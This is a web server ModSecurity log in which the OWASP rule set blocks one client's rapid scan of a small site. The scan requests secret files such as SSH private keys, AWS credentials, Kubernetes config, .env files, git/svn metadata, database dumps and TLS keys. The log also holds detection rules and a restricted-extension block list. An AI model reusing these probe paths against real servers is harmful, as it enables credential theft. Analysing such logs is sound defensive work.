[Tue Nov 19 02:14:38.511168 2024] [:error] [pid 3410974] [client 213.232.87.228:41407] [client 213.232.87.228] ModSecurity: Warning. Matched phrase ".kube/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .kube/ found within REQUEST_FILENAME: /.kube/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.kube/config"] [unique_id "ZzvmfvJ0kVzSNB_DqGbXgwAAAAY"]
[Tue Nov 19 02:14:38.511371 2024] [:error] [pid 3410974] [client 213.232.87.228:41407] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.kube/config"] [unique_id "ZzvmfvJ0kVzSNB_DqGbXgwAAAAY"]
[Tue Nov 19 02:14:38.511538 2024] [:error] [pid 3410974] [client 213.232.87.228:41407] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.kube/config"] [unique_id "ZzvmfvJ0kVzSNB_DqGbXgwAAAAY"]
[Tue Nov 19 02:14:38.733155 2024] [:error] [pid 3411016] [client 213.232.87.228:62619] [client 213.232.87.228] ModSecurity: Warning. Matched phrase ".ssh/id_rsa" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .ssh/id_rsa found within REQUEST_FILENAME: /.ssh/id_rsa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_rsa"] [unique_id "ZzvmfjcHae9t4O2J-ZN78gAAAAc"]
[Tue Nov 19 02:14:38.733371 2024] [:error] [pid 3411016] [client 213.232.87.228:62619] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_rsa"] [unique_id "ZzvmfjcHae9t4O2J-ZN78gAAAAc"]
[Tue Nov 19 02:14:38.733537 2024] [:error] [pid 3411016] [client 213.232.87.228:62619] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.ssh/id_rsa"] [unique_id "ZzvmfjcHae9t4O2J-ZN78gAAAAc"]
[Tue Nov 19 02:14:38.788287 2024] [:error] [pid 3410975] [client 213.232.87.228:14037] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "ZzvmfttOCsWDSRidPn4cTgAAAAk"]
[Tue Nov 19 02:14:38.788515 2024] [:error] [pid 3410975] [client 213.232.87.228:14037] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "ZzvmfttOCsWDSRidPn4cTgAAAAk"]
[Tue Nov 19 02:14:38.788710 2024] [:error] [pid 3410975] [client 213.232.87.228:14037] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "ZzvmfttOCsWDSRidPn4cTgAAAAk"]
[Tue Nov 19 02:14:38.793690 2024] [:error] [pid 3411015] [client 213.232.87.228:8489] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/_vti_pvt/service.pwd"] [unique_id "ZzvmfkeBWkqhU8ZTEfAD9gAAAAQ"]
[Tue Nov 19 02:14:38.794112 2024] [:error] [pid 3411015] [client 213.232.87.228:8489] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/_vti_pvt/service.pwd"] [unique_id "ZzvmfkeBWkqhU8ZTEfAD9gAAAAQ"]
[Tue Nov 19 02:14:38.794406 2024] [:error] [pid 3411015] [client 213.232.87.228:8489] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/_vti_pvt/service.pwd"] [unique_id "ZzvmfkeBWkqhU8ZTEfAD9gAAAAQ"]
[Tue Nov 19 02:14:38.816602 2024] [:error] [pid 3411014] [client 213.232.87.228:52479] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.svn/wc.db"] [unique_id "ZzvmfkfpWewSP51rP127vAAAAAE"]
[Tue Nov 19 02:14:38.816747 2024] [:error] [pid 3411014] [client 213.232.87.228:52479] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.svn/wc.db"] [unique_id "ZzvmfkfpWewSP51rP127vAAAAAE"]
[Tue Nov 19 02:14:38.816913 2024] [:error] [pid 3411014] [client 213.232.87.228:52479] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.svn/wc.db"] [unique_id "ZzvmfkfpWewSP51rP127vAAAAAE"]
[Tue Nov 19 02:14:38.817068 2024] [:error] [pid 3411014] [client 213.232.87.228:52479] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.svn/wc.db"] [unique_id "ZzvmfkfpWewSP51rP127vAAAAAE"]
[Tue Nov 19 02:14:38.817331 2024] [:error] [pid 3411017] [client 213.232.87.228:20659] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/database.sql"] [unique_id "Zzvmflr55UObZy2A3Ot77gAAAAg"]
[Tue Nov 19 02:14:38.817795 2024] [:error] [pid 3411017] [client 213.232.87.228:20659] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database.sql"] [unique_id "Zzvmflr55UObZy2A3Ot77gAAAAg"]
[Tue Nov 19 02:14:38.818081 2024] [:error] [pid 3411017] [client 213.232.87.228:20659] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database.sql"] [unique_id "Zzvmflr55UObZy2A3Ot77gAAAAg"]
[Tue Nov 19 02:14:38.819896 2024] [:error] [pid 3411013] [client 213.232.87.228:46721] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/etc/ssl/private/server.key"] [unique_id "ZzvmfmrT1ZS875CeJzeB_gAAAAA"]
[Tue Nov 19 02:14:38.820488 2024] [:error] [pid 3411013] [client 213.232.87.228:46721] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/etc/ssl/private/server.key"] [unique_id "ZzvmfmrT1ZS875CeJzeB_gAAAAA"]
[Tue Nov 19 02:14:38.820845 2024] [:error] [pid 3411013] [client 213.232.87.228:46721] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/etc/ssl/private/server.key"] [unique_id "ZzvmfmrT1ZS875CeJzeB_gAAAAA"]
[Tue Nov 19 02:14:38.897618 2024] [:error] [pid 3410974] [client 213.232.87.228:16903] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZzvmfvJ0kVzSNB_DqGbXhQAAAAY"]
[Tue Nov 19 02:14:38.898077 2024] [:error] [pid 3410974] [client 213.232.87.228:16903] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZzvmfvJ0kVzSNB_DqGbXhQAAAAY"]
[Tue Nov 19 02:14:38.898457 2024] [:error] [pid 3410974] [client 213.232.87.228:16903] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZzvmfvJ0kVzSNB_DqGbXhQAAAAY"]
[Tue Nov 19 02:14:38.921876 2024] [:error] [pid 3411014] [client 213.232.87.228:3791] [client 213.232.87.228] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "ZzvmfkfpWewSP51rP127vQAAAAE"]
[Tue Nov 19 02:14:38.922128 2024] [:error] [pid 3411014] [client 213.232.87.228:3791] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "ZzvmfkfpWewSP51rP127vQAAAAE"]
[Tue Nov 19 02:14:38.922304 2024] [:error] [pid 3411014] [client 213.232.87.228:3791] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "ZzvmfkfpWewSP51rP127vQAAAAE"]
[Tue Nov 19 02:14:38.929794 2024] [:error] [pid 3411013] [client 213.232.87.228:46671] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "ZzvmfmrT1ZS875CeJzeB_wAAAAA"]
[Tue Nov 19 02:14:38.929980 2024] [:error] [pid 3411013] [client 213.232.87.228:46671] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "ZzvmfmrT1ZS875CeJzeB_wAAAAA"]
[Tue Nov 19 02:14:38.930142 2024] [:error] [pid 3411013] [client 213.232.87.228:46671] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "ZzvmfmrT1ZS875CeJzeB_wAAAAA"]
[Tue Nov 19 02:14:38.933435 2024] [:error] [pid 3411017] [client 213.232.87.228:63737] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Zzvmflr55UObZy2A3Ot77wAAAAg"]
[Tue Nov 19 02:14:38.933691 2024] [:error] [pid 3411017] [client 213.232.87.228:63737] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Zzvmflr55UObZy2A3Ot77wAAAAg"]
[Tue Nov 19 02:14:38.933838 2024] [:error] [pid 3411017] [client 213.232.87.228:63737] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Zzvmflr55UObZy2A3Ot77wAAAAg"]
[Tue Nov 19 02:14:39.032302 2024] [:error] [pid 3411013] [client 213.232.87.228:44819] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/server.key"] [unique_id "Zzvmf2rT1ZS875CeJzeCAAAAAAA"]
[Tue Nov 19 02:14:39.032610 2024] [:error] [pid 3411013] [client 213.232.87.228:44819] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/server.key"] [unique_id "Zzvmf2rT1ZS875CeJzeCAAAAAAA"]
